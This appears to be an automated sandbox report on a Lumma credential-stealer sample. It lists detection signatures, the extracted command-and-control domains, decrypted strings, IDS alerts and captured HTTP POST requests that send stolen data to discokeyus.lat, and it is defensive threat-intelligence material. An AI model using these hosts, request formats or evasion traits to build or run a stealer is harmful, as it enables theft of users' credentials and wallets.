Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gJkNLYV0ax.exe

Overview

General Information

Sample name:gJkNLYV0ax.exe
renamed because original name is a hash value
Original sample name:f158cdb34eb5c4de5eb858cce72f94cb.exe
Analysis ID:1578918
MD5:f158cdb34eb5c4de5eb858cce72f94cb
SHA1:e93703e534ee3572c5134be5b316e1ae5feeb9c0
SHA256:801900fc452dc3d0f333fe3be08e78406099be541daff50b7de46f4209d54c0c
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • gJkNLYV0ax.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\gJkNLYV0ax.exe" MD5: F158CDB34EB5C4DE5EB858CCE72F94CB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["necklacebudi.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1998585611.0000000001A3C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: gJkNLYV0ax.exe PID: 7308JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 3 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:19.893839+010020283713Unknown Traffic192.168.2.449731104.21.21.99443TCP
                2024-12-20T16:39:36.192992+010020283713Unknown Traffic192.168.2.449734104.21.21.99443TCP
                2024-12-20T16:39:38.571587+010020283713Unknown Traffic192.168.2.449737104.21.21.99443TCP
                2024-12-20T16:39:40.841707+010020283713Unknown Traffic192.168.2.449739104.21.21.99443TCP
                2024-12-20T16:39:43.252650+010020283713Unknown Traffic192.168.2.449741104.21.21.99443TCP
                2024-12-20T16:39:46.580757+010020283713Unknown Traffic192.168.2.449742104.21.21.99443TCP
                2024-12-20T16:39:49.456371+010020283713Unknown Traffic192.168.2.449743104.21.21.99443TCP
                2024-12-20T16:39:53.857296+010020283713Unknown Traffic192.168.2.449744104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:34.885495+010020546531A Network Trojan was detected192.168.2.449731104.21.21.99443TCP
                2024-12-20T16:39:36.965276+010020546531A Network Trojan was detected192.168.2.449734104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:34.885495+010020498361A Network Trojan was detected192.168.2.449731104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:36.965276+010020498121A Network Trojan was detected192.168.2.449734104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:19.893839+010020583611Domain Observed Used for C2 Detected192.168.2.449731104.21.21.99443TCP
                2024-12-20T16:39:36.192992+010020583611Domain Observed Used for C2 Detected192.168.2.449734104.21.21.99443TCP
                2024-12-20T16:39:38.571587+010020583611Domain Observed Used for C2 Detected192.168.2.449737104.21.21.99443TCP
                2024-12-20T16:39:40.841707+010020583611Domain Observed Used for C2 Detected192.168.2.449739104.21.21.99443TCP
                2024-12-20T16:39:43.252650+010020583611Domain Observed Used for C2 Detected192.168.2.449741104.21.21.99443TCP
                2024-12-20T16:39:46.580757+010020583611Domain Observed Used for C2 Detected192.168.2.449742104.21.21.99443TCP
                2024-12-20T16:39:49.456371+010020583611Domain Observed Used for C2 Detected192.168.2.449743104.21.21.99443TCP
                2024-12-20T16:39:53.857296+010020583611Domain Observed Used for C2 Detected192.168.2.449744104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:18.189508+010020583601Domain Observed Used for C2 Detected192.168.2.4551461.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:18.045613+010020583641Domain Observed Used for C2 Detected192.168.2.4492171.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:17.895965+010020583781Domain Observed Used for C2 Detected192.168.2.4589991.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:49.461411+010020480941Malware Command and Control Activity Detected192.168.2.449743104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T16:39:49.461411+010028438641A Network Trojan was detected192.168.2.449743104.21.21.99443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: gJkNLYV0ax.exeAvira: detected
                Found malware configuration
                Source: gJkNLYV0ax.exe.7308.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: gJkNLYV0ax.exeVirustotal: Detection: 57%Perma Link
                Source: gJkNLYV0ax.exeReversingLabs: Detection: 65%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: gJkNLYV0ax.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: sweepyribs.lat
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
                Source: gJkNLYV0ax.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:49217 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:55146 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49731 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49741 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:58999 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49739 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49743 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49742 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49734 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49744 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49737 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49743 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49734 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.21.99:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Joe Sandbox ViewIP Address: 104.21.21.99 104.21.21.99
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.21.99:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LI06XNEYW6QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18121Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V1TMRKCAPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8730Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LVE2G100NVGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20395Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X3K3GI65MXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1209Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KI1BBKSJ3BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570728Host: discokeyus.lat
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: gJkNLYV0ax.exe, 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2084411862.0000000001A2F000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027466840.00000000019F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro0
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: gJkNLYV0ax.exe, 00000000.00000003.2084411862.0000000001A41000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1963481216.000000000608F000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085788889.0000000001A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
                Source: gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/M
                Source: gJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2087129404.0000000006080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
                Source: gJkNLYV0ax.exe, 00000000.00000002.2087129404.0000000006080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiKed5
                Source: gJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiQx
                Source: gJkNLYV0ax.exe, 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiU2
                Source: gJkNLYV0ax.exe, 00000000.00000002.2085682261.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2084563810.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027466840.00000000019F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiby
                Source: gJkNLYV0ax.exe, 00000000.00000002.2085484486.00000000019A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apid
                Source: gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/t
                Source: gJkNLYV0ax.exe, gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api
